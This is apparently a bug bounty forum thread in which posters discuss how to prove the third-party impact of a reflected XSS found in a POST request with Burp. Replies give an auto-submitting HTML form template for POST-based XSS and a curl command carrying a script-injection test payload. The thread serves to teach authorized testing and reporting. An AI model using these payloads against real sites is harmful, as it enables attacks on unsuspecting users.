Reflected XSS with Burp

If you can get reflected XSS via a POST request and see the execution by doing right click > Show in browser in Burp, apparently the Hackerone personnel needs more info. If this isn’t enough to report an XSS bug, what else could I do to show the impact to third-parties? To my knowledge, it’s kind of hard to do with a POST request as you can’t just copy the URL and send it to a victim. They requested a “step by step PoC to show the impact to third parties”. I guess this is just me being dumb and a noob, but I thought that was enough information to report a bug?

Could you give some more details?
I don’t get the complete picture of what you are doing :wink:

  • What exactly is your payload?
  • Could you give us the url to the endpoint?
  • What does that endpoint return? JSON, HTML, text or something else?
  • Where is that Endpoint used in the normal application workflow?

Just a wild guess about the missing impact:
Imagine you find an endpoint that echoes everything. As long as it’s only accepting POST data and the rest of the web application doesn’t use it anywhere, there is no impact to third parties.

However if you find that the application is using some JavaScript to extract an url param, sends that to this echo endpoint and then inserts the response into the users document you could maybe (e.g. if the JS code doesn’t sanitise the param properly) exploit that by crafting an url with a malicious parameter.
So my guess: you are missing this last part…

Hello @kannix, thank you for your response! I actually figured it out. So, in the POST request, there were a ton of different parameters. I only found that one was vulnerable to XSS. I right-clicked in Burp and changed the request to a GET, tested as is, but was failing with all the parameters. Long story short: I removed all parameters except the one that was vulnerable via the POST method and I was able to get my payload to execute.

1 Like

Next time you can try something like this:

<form action="vulnerable_url" method="post">
<input type='hidden' name='vulnreable_parameter' value='xss_payload'>
</form>
<script>
document.forms[0].submit()
</script>

Anyway, you got a better proof of concept that the POST one!

3 Likes

Hey @stefanofinding, thank you very much for the response! I’ll definitely keep this in my belt for next time. Appreciate the help!

1 Like

A lot of times, a cURL requests comes in handy
https://ec.haxx.se/http-post.html

Usually you can find curl in linux distros (Ubuntu, CentOS, Kali, etc.) - open up bash (sometimes referred to as “the terminal” or “command prompt”) and your command might be something as simple as
curl --data-urlencode "param1=\'><script>confirm(1)</script>" https://www.127.0.0.1.com

It also includes HTTP headers!

hey, so it’s been a year since you’ve posted, i’m also facing the same scenario right now, where i can get reflected XSS in GET request from click > show in browser, it’s getting popped but it’s for only one time when i paste and run in browser. so can anyone help me to solve it?